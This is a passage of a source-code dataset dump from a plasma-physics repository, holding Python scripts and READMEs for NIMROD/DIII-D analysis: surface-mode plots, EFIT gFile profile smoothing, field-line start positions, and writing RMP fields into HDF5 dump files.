ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$<r_m>$',fontsize=24)\n ax.set_ylabel(r'$B_m$',fontsize=24)\n \n plt.savefig('Bm2wall16.png',bbox_inches='tight')\n\n\nif plotmag==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],bnm[xyfile,9,1:ibmax].real,color='m',label='m=-1',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,8,1:ibmax].real,color='r',label='m=-2',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,7,1:ibmax].real,color='b',label='m=-3',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,6,1:ibmax].real,color='g',label='m=-4',lw=3)\n ax.plot(rho[fgfile],bnm[xyfile,11,1:ibmax].real,color='cyan',label='m=1',lw=3)\n ax.axvline(x=rho[fgfile][irho2],lw=3,ls=(0,(3,2)),c='r',label=r'$q=2$')\n ax.axvline(x=rho[fgfile][irho3],lw=3,ls=(0,(3,2)),c='b',label=r'$q=3$')\n ax.axvline(x=rho[fgfile][irho4],lw=3,ls=(0,(3,2)),c='g',label=r'$q=4$')\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$\\rho$',fontsize=24)\n ax.set_ylabel(r'$B_m$',fontsize=24)\n \n plt.savefig('Bm16.png',bbox_inches='tight')\n\nif plotsurf2wall==1:\n bmmax=np.amax(bnm[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.002792068 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho1[1:],np.rot90(bnm[xyfile,:,1:],k=-1),levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_m$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[1:irho110],rho1[1:irho110],c='white',lw=5,ls=(0,(10,2)),label=r'$m=qn$')\n \n ax.axhline(y=rho1[irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axhline(y=rho1[irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axhline(y=rho1[irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n ax.axhline(y=rho1[irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n ax.axhline(y=rho1[irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-6$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$<r_m>$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n \n ax.set_ylim([.1,1.45]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn2wall00.png',bbox_inches='tight')\n\nif plotsurf==1:\n bmmax=np.amax(bnm[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n bmmax=0.00278744622 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho[fgfile],bnm[xyfile,:,1:ibmax],levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_m$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[:479],rho[fgfile],c='white',lw=5,ls=(0,(10,2)),label=r'$m=qn$')\n \n ax.axhline(y=rho[fgfile][irho2],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n ax.axhline(y=rho[fgfile][irho3],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n ax.axhline(y=rho[fgfile][irho4],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$\\rho$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n \n ax.set_ylim([.1,.99]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn16.png',bbox_inches='tight')\n\nif plotFSArea==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],FSArea[1:256],color='r')\n ax.set_xlabel(r'$\\rho$')\n ax.set_ylabel(r'Flux Surface Area ${\\rm m^2}$')\n\nif plotqcompare==1:\n \n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],q1[1:256],color='r',label='Mine')\n ax.plot(rho[fgfile],qg[fgfile],color='b',label='Fluxgrid')\n ax.legend()\n ax.set_xlabel(r'$\\rho$')\n ax.set_ylabel(r'$q$')\n\nif plottheta==1:\n\n thmax=np.max(theta_str[1:,:])\n thmin=np.min(theta_str[1:,:])\n \n# if abs(thmax)>abs(thmin):\n# thmin=-thmax\n# else:\n# thmax=-thmin\n \n levels=np.arange(thmin,thmax,(thmax-thmin)/clines)\n \n fig,ax=plt.subplots()\n \n CS = ax.contourf(R[files[0]],Z[files[0]],theta_str,clines,cmap=cm.nipy_spectral)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_aspect('equal')\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$\\Theta$',fontsize=24)\n\n ax.set_xlabel(r'$R\\,{\\rm (m)}$',fontsize=24)\n ax.set_ylabel(r'$Z\\,{\\rm (m)}$',fontsize=24)\n\n plt.savefig('Theta_straight.png',bbox_inches='tight')\n\n\nif plotjac==1:\n pr_max = np.max(jac)\n pr_min = np.min(jac)\n \n #if abs(pr_max)>abs(pr_min):\n # pr_min=-pr_max\n #else:\n # pr_max=-pr_min\n \n lev,delta=np.linspace(pr_min,pr_max,clines,retstep=True) \n \n fig,ax=plt.subplots(figsize=(5,6)) \n CS=ax.contourf(R[files[0]],Z[files[0]],jac,levels=lev,cmap=cm.gnuplot2)\n \n ax.set_aspect('equal')\n \n plt.setp(ax.get_xticklabels(), fontsize=18)\n plt.setp(ax.get_yticklabels(), fontsize=18)\n #plt.setp(ax.get_yticklabels(), fontsize=12)\n #ax.set_xlabel('$\\sqrt{\\psi} $',fontsize=30)\n #ax.set_ylabel('$q $',fontsize=30,rotation='horizontal')\n ax.set_title(r'Jacobian',fontsize=22)\n ax.set_xlabel(r'$R\\,{\\rm(m)}$',fontsize=20)\n ax.set_ylabel(r'$ Z\\,{\\rm(m)}$',fontsize=20)\n #cbar=plt.colorbar(CS,pad=0.01,format=\"%0.000f\")\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n \n plt.savefig('xy_jac_00000.png',bbox_inches='tight') \n\nif plotqcon==1:\n\n qcon=np.zeros((len(R[files[0]]),len(R[files[0]][0])))\n\n for i in range(len(qcon)):\n for j in range(len(qcon[0])):\n qcon[i,j]=q1[i]\n\n pr_max = np.max(qcon)\n pr_min = np.min(qcon)\n \n #if abs(pr_max)>abs(pr_min):\n # pr_min=-pr_max\n #else:\n # pr_max=-pr_min\n \n lev,delta=np.linspace(pr_min,pr_max,clines,retstep=True)\n \n qlev=np.array([-4,-3,-2]) \n \n fig,ax=plt.subplots(figsize=(5,6)) \n CS=ax.contourf(R[files[0]],Z[files[0]],qcon,levels=lev,cmap=cm.gnuplot2)\n \n QS=ax.contour(R[files[0]],Z[files[0]],qcon,levels=qlev,colors='k',linestyles='solid')\n \n fmt = {}\n strs=[r'$q=\\!-4$',r'$q=\\!-3$',r'$q=\\!-2$']\n for l, s in zip(QS.levels, strs):\n fmt[l] = s\n \n manual_locations=[(1.36,0.85),(1.42,0.73),(1.48,0.59)]\n \n ax.clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n \n ax.set_aspect('equal')\n \n plt.setp(ax.get_xticklabels(), fontsize=18)\n plt.setp(ax.get_yticklabels(), fontsize=18)\n #plt.setp(ax.get_yticklabels(), fontsize=12)\n #ax.set_xlabel('$\\sqrt{\\psi} $',fontsize=30)\n #ax.set_ylabel('$q $',fontsize=30,rotation='horizontal')\n ax.set_title(r'Safety Factor',fontsize=22)\n ax.set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n ax.set_ylabel(r'${\\rm Z\\,(m)}$',fontsize=20)\n #cbar=plt.colorbar(CS,pad=0.01,format=\"%0.000f\")\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n \n plt.savefig('xy_q_00000.png',bbox_inches='tight') \n\nplt.show()" }, { "alpha_fraction": 0.610947847366333, "alphanum_fraction": 0.6401543021202087, "avg_line_length": 31.011764526367188, "blob_id": "ae0f55adb4e465d51e34019c27906a010cf012b5", "content_id": "d8c4e4e49365a816761c6d67f82c35bde44fc180", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5444, "license_type": "no_license", "max_line_length": 124, "num_lines": 170, "path": "/diiidNim/gFileClean.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n''' This file reads an gFile, allows the user to modify the F and p profiles,\n and then writes a new gFile. This is useful for cleaning up the profiles \n near the axis.\n'''\n\nimport os\nimport datetime \nimport numpy as np\nimport numpy as np\nfrom scipy.interpolate import splev,splrep\nimport matplotlib.pyplot as plt\n\n\ndef readWriteEfitHeader(read_file, write_file):\n '''This function reads are writes the EFIT File Header \n and returns the mesh mx and my''' \n this_line = f.readline()\n this_words = this_line.split()\n efit_id = this_words[0]\n today = datetime.date.today().strftime(\"%m/%d/%Y\") \n shot_num = this_words[2]\n recon_time = this_words[3]\n no_clue = int(this_words[4])\n mx = int(this_words[5])\n my = int(this_words[6])\n header = \" {0:<9s}{1:<14s}{2:<9s}{3:<17s}{4:<2d}{5:<4d}{6:<4d}\\n\".format(efit_id,today,shot_num,recon_time,no_clue,mx,my)\n write_file.write(header)\n for ii in range(4):\n this_line = f.readline()\n write_file.write(this_line)\n return mx, my\n\ndef readWriteRestFile(read_file,write_file):\n while True:\n this_line=f.readline()\n if (len(this_line)==0): break\n write_file.write(this_line)\n\ndef readProfile(read_file, ma):\n profile = np.zeros(ma)\n floats_per_line = 5\n lines = ma // floats_per_line\n float_length=16\n for ii in range(0,lines):\n this_line = f.readline()\n for jj in range(0,floats_per_line):\n profile[ii*floats_per_line + jj] = float(this_line[jj*16:(jj+1)*16])\n this_line = f.readline()\n ii = lines\n for jj in range(0, ma % floats_per_line):\n profile[ii*floats_per_line + jj] = float(this_line[jj*16:(jj+1)*16])\n return profile\n\ndef writeProfile(write_file, profile):\n floats_per_line = 5 \n float_length=16\n for ii in range(profile.size//floats_per_line):\n this_line=''\n for jj in range(floats_per_line):\n this_line += '{: 16.9E}'.format(profile[ii*floats_per_line+jj])\n write_file.write(this_line+'\\n')\n this_line=''\n ii = profile.size//floats_per_line\n for jj in range(0, profile.size % floats_per_line):\n this_line += '{: 16.9E}'.format(profile[ii*floats_per_line+jj])\n write_file.write(this_line+'\\n')\n\n\nclass modField:\n def __init__ (self, mode, psi_1, fit_args):\n self.mode = mode\n self.psi_1 = psi_1\n self.fit_args = fit_args\n def quadFit(self, value_1, dvalue_1):\n ''' Fit a quadratic function from psi=0 to psi_i to the profile\n\n The first constraint is psi_1 is continuious. This first argument\n determines which other constraints are used. The options are\n 0: profile at psi_0 and derivative at psi = 0\n 1: profile at psi_0 and derivative at psi_1\n 2: derivative at psi=0 and psi_1\n Second argument is the first constraint \n profile at 0 for fit_args[0]= 0,1\n derivative at 0 for fit_args[0] = 2\n Third argument is the second constraint in needed\n '''\n if self.fit_args[0]==0:\n self.quadC = self.fit_args[1]\n self.quadB = self.fit_args[2]\n self.quadA = (value_1-self.quadB * self.psi_1 - self.quadC)/(self.psi_1**2)\n elif self.fit_args[0]==1:\n self.quadC = self.fit_args[1]\n self.quadA = (dvalue_1 * self.psi_1 +self.quadC - value_1)/self.psi_1**2\n self.quadB = dvalue_1 - 2.0 * self.quadA * self.psi_1\n elif self.fit_args[0]==2:\n # do something\n print(\"Todo\")\n else:\n raise ValueError(\"Mode not defined for quad fit\")\n def quadEval(self, psi):\n return self.quadA * psi**2 + self.quadB * psi + self.quadC\n def smooth (self, psi, field):\n ''' This function smooths a field field'''\n splineField = splrep(psi,field,k=3)\n field_psi_1 = splev(self.psi_1,splineField)\n dField_psi_1 = splev(self.psi_1,splineField,der=1)\n if self.mode==\"quad\":\n self.quadFit(field_psi_1,dField_psi_1)\n\n tempField = np.zeros(field.size)\n for ix, ipsi in enumerate(psi):\n if (ipsi < self.psi_1):\n if self.mode==\"quad\":\n tempField[ix] = self.quadEval(ipsi)\n else:\n tempField[ix] = field[ix]\n\n newSplineField = splrep(psi,tempField[:],k=3)\n\n# plot fields\n x2 = np.linspace(0, 1, 200)\n y2 = splev(x2, splineField)\n y3 = splev(x2, newSplineField)\n plt.plot(x2, y2, x2, y3)\n plt.show()\n \n return tempField\n\n\n\nhome_dir = os.environ['HOME']\nscratch_dir = \"/SCRATCH\"\nlocal_dir = \"/174446_novac_debug/eq21\"\ngfile = \"g174446.03390\"\nnew_gfile = gfile + \".mod3\"\nfull_read_file = home_dir + scratch_dir + local_dir +\"/\"+ gfile\nfull_write_file = home_dir + scratch_dir + local_dir +\"/\"+ new_gfile\n\nsmooth_f = True\nnew_f_profile = modField(\"quad\", 0.1, (1, -3.479))\nsmooth_p = True\nnew_p_profile = modField(\"quad\", 0.1, (0, 86000., 0.0))\n\nwith open(full_read_file) as f:\n with open(full_write_file,'w') as out_file:\n mx, my = readWriteEfitHeader(f, out_file)\n print(mx,my)\n \n psi = np.zeros(mx)\n for ii in range(mx):\n psi[ii]= ii/(mx-1)\n f_profile = readProfile(f,mx)\n p_profile = readProfile(f,mx)\n q_profile = readProfile(f,mx)\n m_profile = readProfile(f,mx)\n if smooth_f:\n f_profile = new_f_profile.smooth(psi,f_profile)\n if smooth_p:\n p_profile = new_p_profile.smooth(psi,p_profile)\n\n\n writeProfile(out_file,f_profile)\n writeProfile(out_file,p_profile)\n writeProfile(out_file,q_profile)\n writeProfile(out_file,m_profile)\n readWriteRestFile(f,out_file)\n\n# with(full_write_file,'w') as out_file:\n# read the file header\n\n\n" }, { "alpha_fraction": 0.5325829386711121, "alphanum_fraction": 0.5568720102310181, "avg_line_length": 34.9361686706543, "blob_id": "d315dfa1af9eef36acd63e52e3117e31e576da4a", "content_id": "f796a0458dcf7ed71f13bc6ee6b847bcb59c6a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1688, "license_type": "no_license", "max_line_length": 78, "num_lines": 47, "path": "/nimflSeed/startPosClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' Base class for generating start position data '''\nimport numpy as np\nimport random as ran\n\nclass startPosClass:\n numPoints=-1\n randomPhi = False\n phiPlane = 0.0\n rzp = np.zeros([1,3])\n geom = \"none\"\n def __init__ (self,numPoints,geom,randomPhi,phiPlane):\n ''' Initialize start position class '''\n self.numPoints = numPoints\n self.geom = geom\n self.randomPhi = randomPhi\n self.phiPlane = phiPlane\n self.rzp = np.zeros([self.numPoints,3])\n if (not self.randomPhi):\n self.rzp[:,2]=self.phiPlane\n def d3dlowerRZPhi(self):\n ''' generate a collection of rzp points for the lower d3d divertor '''\n for ii in range(self.numPoints):\n top=1\n bottom= -1.2\n left=1.2\n right=2.3\n self.rzp[ii,0]=ran.uniform(left,right)\n self.rzp[ii,1]=ran.uniform(bottom,top)\n if self.randomPhi:\n self.rzp[ii,2] = ran.uniform(0,2*np.pi)\n def calculateRZPhi(self):\n if self.geom=='d3dlower':\n self.d3dlowerRZPhi()\n elif self.geom=='d3d':\n print(\"d3d geom\")\n else: # do nothing\n print(\"Geom: \", geom, \" not reconized\")\n def writeStartPos(self,fileName):\n thisFile = open(fileName,'w')\n thisFile.write(str(self.numPoints)+\"\\n\")\n for jj in range(self.numPoints):\n thisLine = '{: 16.16e}'.format(self.rzp[jj,0]) + \", \" \n thisLine+= '{: 16.16e}'.format(self.rzp[jj,1]) + \", \" \n thisLine+= '{: 16.16e}'.format(self.rzp[jj,2]) + \"\\n\" \n thisFile.write(thisLine)\n thisFile.close()" }, { "alpha_fraction": 0.713302731513977, "alphanum_fraction": 0.718654453754425, "avg_line_length": 30.16666603088379, "blob_id": "008617e286426f341d5f3f4d69a6fd81b47191d1", "content_id": "8cd420bb0a1ce3061b5ce162ce267166174afcbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/biotSavart/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# biotSavart\nThese scripts calculate the edge magnetic field from external rmp coils\nby integrating the Biot Savart law \n\n## Inputs:\n - Coil specification\n - Coil currents\n - NIMROD boundary node locations\n\n## Outputs:\n - Edge magnetic field decomposed by toroidal mode\n\n## Classes:\n - A generic coil class\n - Specific ways to specify C-coil and I-coil like perturbations\n - Biot-Savart Integrator\n\n## Key Steps:\n - Read in node locations and generate a list of r' points\n - Generate coils\n - Integrate Biot-Savart Equation\n - FFT B-Field to get Fourier decomposition\n - Write bmn file\n\n## Status: \n - Can setup simple circular coils\n - ODE integrator up and running\n - Tested with circular coil and point at the center of coil\n - Simple test of C coil with n=0 and n=1 pert at 0,0,0\n - Code runs, n=1 c coil fields look reasonable\n - Much of the functionality needs to be moved to functions, to clean up\n\n## Todo:\n - [x] Read node locations at generate r' points\n - [x] Write coil class\n - [x] Write initialization for circular coils\n - [x] Write initialization for C-coils \n - [ ] Write initialization for I-coils\n - [x] Write Biot-Savart Integrator\n - [x] Test integrator for planar coils\n - [x] Write FFT and write functionality (can copy lots from trip2NIM)\n - [ ] Plot coils" }, { "alpha_fraction": 0.7808641791343689, "alphanum_fraction": 0.7808641791343689, "avg_line_length": 34.77777862548828, "blob_id": "3ad99697b44ca61fe47a25adf6f671d99631df20", "content_id": "311ae9f1b38beb1a8de46b1b1c2d96391266562b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "no_license", "max_line_length": 77, "num_lines": 9, "path": "/surfmn/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# surfmnScan\n\nA utility for analyzing a bunch of surfmn plots and making pretty pictures\n\nTo start I will want to look over a bunch of directors in the present working\ndirectory, plot the data, get the time step, and find psi at the rational \nsurface.\n\nIn the future I might tie this into nimpy and do the surfmn analysis\n\n\n" }, { "alpha_fraction": 0.5892265439033508, "alphanum_fraction": 0.6227900385856628, "avg_line_length": 28.5510196685791, "blob_id": "279bcd90e3f7707bfd308eff5272146e5f6a2e3e", "content_id": "493a168119d4fce551eed4c27ce020a68fce4407", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7240, "license_type": "no_license", "max_line_length": 95, "num_lines": 245, "path": "/trip2Nim/writeRmpToDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n# This script writes rmp data stored in brmpn##.dat file to a brmp fields in\n# the NIMROD dumpfile.\n#\n# Input files:\n# dumpFile - nimrod hdf5 dump file, this file will be modified\n# brmp##.dat - dat files storing the rmp fields at the nimrod boudnary\n# Ouput file:\n# dumpFile -hdf5 dump file\n\n#to do list...\n#script inputs -dump file, brmpfile directory, flag to add rmp to be, optional n-list\n\n#read brmp files\n#check for keff capibility\n#\nimport h5py\nimport numpy as np\n\ndef getBlockKey(bl):\n '''Return block key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n return f'{bl:04d}'\n\ndef getSeamKey(bl):\n '''Return seam key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<0):\n print(\"bl must be in [0,9999]\")\n raise ValueError\n return f'{bl:04d}'\n\ndef getBeKeys(bl):\n '''Return Be keys strings corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rebe'+f'{bl:04d}'\n imKey='imbe'+f'{bl:04d}'\n return reKey,imKey\n\ndef getBrmpKeys(bl):\n '''Return Brmp keys strings corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rebrmp'+f'{bl:04d}'\n imKey='imbrmp'+f'{bl:04d}'\n return reKey,imKey\n\ndef getRzedgeKey(bl):\n '''Return rzedge key string corresponding to the block number bl'''\n if not (isinstance(bl,(int,np.integer)) ):\n raise TypeError\n elif (bl>=10000 or bl<1):\n print(\"bl must be in [1,9999]\")\n raise ValueError\n reKey='rzedge'+f'{bl:04d}'\n return reKey\n\ndef readBrmp(nn,fdir='',prefix='brmpn',suffix='.dat'):\n '''reads brmp file and returns an brmp as a np array'''\n if not (isinstance(nn,(int,np.integer)) ):\n raise TypeError\n elif (nn<0):\n print(\"nn must be zero or positive\")\n raise ValueError\n brmpFile=fdir+prefix+f'{nn:02d}'+suffix\n try:\n tempData=np.genfromtxt(brmpFile,delimiter=',')\n #second index of tempData should have 6 values\n #Each corresponding or Re or Im of each vector component of Bn\n if not (tempData.shape[1]==6):\n print(f'Data in {brmpFile} has wrong dimensions')\n raise ValueError\n brmp = np.zeros([tempData.shape[0],3],dtype=np.complex128)\n for ii in range(tempData.shape[0]):\n brmp[ii,0]=tempData[ii,0]+tempData[ii,1]*1.0j\n brmp[ii,1]=tempData[ii,2]+tempData[ii,3]*1.0j\n brmp[ii,2]=tempData[ii,4]+tempData[ii,5]*1.0j\n except OSError:\n print(f'{brmpFile} not found')\n raise\n return brmp\n\n\ndef writeBrmp(dumpFile,nList=[],hardFail=False):\n '''Main driver function to write Brmp to dump file'''\n with h5py.File(dumpFile, 'r+') as h5DumpFile:\n #get list of nmodes\n nmodeDict = {}\n fillList=False\n if not nList:\n fillList=True\n for ii, nn in enumerate(h5DumpFile['keff']):\n nmodeDict[int(nn)]=ii\n if fillList:\n nList.append(int(nn))\n #analyze mesh need to check if mesh is a polar mesh and find nybl\n polarMesh=True\n nybl=0\n seam0=h5DumpFile['seams'][getSeamKey(0)]\n edgeBlock=set()\n for vertex in seam0['vertex']:\n edgeBlock.add(vertex[0])\n nybl=len(edgeBlock)\n #search for corners, if found we know mesh is not polar\n for excorner in seam0['excorner']:\n if (excorner):\n polarMesh=False\n break\n if not polarMesh:\n raise Exception(\"Mesh in dumpfile is not a polar mesh.\")\n #loop over nList and modify Brmp\n for nn in nList:\n if not nn in nmodeDict:\n print(f'Warning {nn} is not a Fourier mode in {dumpFile}')\n if hardFail:\n raise ValueError\n else:\n continue\n try:\n brmp=readBrmp(nn)\n nIndex=nmodeDict[nn]\n print(nIndex)\n except OSError:\n if hardFail:\n raise\n else:\n print(\"Continuing with next foruier mode\")\n except:\n raise\n print(nmodeDict)\n print(nList)\n\nif __name__ == \"__main__\":\n dumpFile = \"/home/ehowell/SCRATCH/166439/03300_fgnimeq_q104_reorder_normp/dumpgll.00000.h5\"\n writeBrmp(dumpFile,nList=[15],hardFail=True)\n\n\n\n\n#exit()\ndumpFile = \"/home/ehowell/SCRATCH/166439/03300_fgnimeq_q104_reorder_test/dumpgll.00000.h5\"\nh5DumpFile = h5py.File(dumpFile, 'r') #h5instance of dumpfile r+ for read/write\n\n#file structure\n# h5dump.keys = dumpTime, keff, rblocks, seams\nfor key in h5DumpFile.attrs.items():\n print(key)\nfor key in h5DumpFile['dumpTime'].attrs:\n print(key)\nprint(h5DumpFile['dumpTime'].attrs.get('vsTime'))\nprint(h5DumpFile['dumpTime'])\n#get list of nmodes\nnmodeList = []\nfor ii in h5DumpFile['keff']:\n nmodeList.append(int(ii))\n\n#get list of external vertices from seam0\n#seam zero has 3 keys, np, vertex, and excorner\n#vertex has a list of block and vertex id\n#vertex indicate how many vertex share an exterior vertex\n#excorner is a flag to indicate vertex is a corner\nseam0=h5DumpFile['seams'][getSeamKey(0)]\nh5np=list(seam0['np'])\nprint(h5np)\nedgeBlock=set()\nfor key in seam0:\n print(key)\nfor vertex in seam0['vertex']:\n edgeBlock.add(vertex[0])\nprint(edgeBlock)\nprint(len(edgeBlock))\npolar=True\nfor excorner in seam0['excorner']:\n if (excorner):\n polar=False\n break\n print(excorner)\nprint(polar)\nseam1=h5DumpFile['seams'][getSeamKey(32)]\nfor key in seam1:\n print(key)\nfor ii in seam1['intxy']:\n print(ii)\nexit()\nvertex=list(seam0['vertex'])\nprint(vertex)\nprint(vertex[0][0])\nsum=0\nfor block, node in vertex:\n sum+=1\n print(block,node)\n print(h5DumpFile['rblocks'][getBlockKey(block)][getBrmpKeys(block)[0]][node])\n print(h5DumpFile['rblocks'][getBlockKey(block)][getBrmpKeys(block)[1]][node])\nprint(sum)\nexit()\n\nfor key in h5DumpFile['seams']['0032']:\n print(key)\nfor ii in h5DumpFile['seams']['0032']['intxy']:\n print(ii)\nfor key in h5DumpFile['rblocks']['0032']:\n print(key)\nprint(h5DumpFile['rblocks']['0032']['rz0032'])\nprint(getBrmpKeys(32))\nprint(h5DumpFile['rblocks']['0032'][getRzedgeKey(32)])\nfor ii in h5DumpFile['rblocks']['0032'][getBrmpKeys(32)[0]]:\n print(ii)\nexit()\nfor key in h5DumpFile.keys():\n print(key)\n\nfor keff in h5DumpFile['keff']:\n print(keff)\n\nfor rblock in h5DumpFile['rblocks']:\n print(rblock)\n\nfor seams in h5DumpFile['seams']:\n print(seams)\n\nseam0=h5DumpFile['seams']['0000']\nfor key in seam0:\n print(key)\n\nsum=0\nfor ii in seam0['np']:\n print(ii)\n sum+=ii\n\nprint(sum)\nfor ii in seam0['vertex']:\n print(ii)\n" }, { "alpha_fraction": 0.5425214171409607, "alphanum_fraction": 0.6458872556686401, "avg_line_length": 30.381250381469727, "blob_id": "5d29f91040381c883f626a8f66c5175ca18752cd", "content_id": "4735ecc8572092c62c161a3c682769a9d7ea0a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "no_license", "max_line_length": 141, "num_lines": 160, "path": "/plotingScripts/footPointPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a surfcross.txt file and plots the magnetic footpoint'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\ndef rzToS(r,z):\n tol=1e-4\n r1=1.016\n z1=-1.223\n r2=1.153\n z2=-1.363\n r3=1.372\n z3=-1.363\n r4=1.372\n r5=1.682\n z4=-1.25\n m2=(z2-z1)/(r2-r1)\n b2=z1-m2*r1\n l2 =m.sqrt((z2-z1)**2 +(r2-r1)**2)\n if ( 